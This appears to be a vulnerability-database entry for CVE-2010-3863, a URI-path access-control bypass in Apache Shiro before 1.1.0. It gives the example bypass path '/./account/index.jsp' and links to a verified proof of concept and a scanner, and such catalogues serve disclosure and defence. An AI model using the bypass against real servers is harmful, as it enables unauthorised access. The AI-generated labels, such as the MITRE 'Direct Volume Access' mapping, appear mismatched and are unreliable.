CVE-2010-3863

Apache Shiro < 1.1.0 and JSecurity 0.9.x - Path Traversal via URI Path Bypass

Title source: llm

Exploitation Summary

EIP tracks 2 public exploits for CVE-2010-3863. PoCs published by Luke Taylor, sh1inroot-alt.

AI-analyzed exploit summary This exploit demonstrates a directory traversal vulnerability in Apache Shiro 1.0.0 by sending a crafted HTTP GET request to access sensitive files. The vulnerability arises from insufficient input sanitization, allowing path traversal sequences.

Description

Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.

Exploits (2)

exploitdb WORKING POC VERIFIED

by Luke Taylor · textremotemultiple

https://www.exploit-db.com/exploits/34952

View Code ZIP pw:eip

This exploit demonstrates a directory traversal vulnerability in Apache Shiro 1.0.0 by sending a crafted HTTP GET request to access sensitive files. The vulnerability arises from insufficient input sanitization, allowing path traversal sequences.

Classification

Working Poc 90%

Attack Type

Info Leak

Complexity

Trivial

Reliability

Reliable

Target: Apache Shiro 1.0.0

No auth needed

Prerequisites: Network access to the target server

MITRE ATT&CK

T1006 - Direct Volume Access

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec SCANNER

by sh1inroot-alt · poc

https://github.com/sh1inroot-alt/shiro-cve-2010-3863

View Code ZIP pw:eip

The repository contains a YAML-based scanner for detecting CVE-2010-3863, a path traversal vulnerability in Apache Shiro. It checks for the presence of the '/./admin/' path and verifies the response contains 'Account Info'.

Classification

Scanner 90%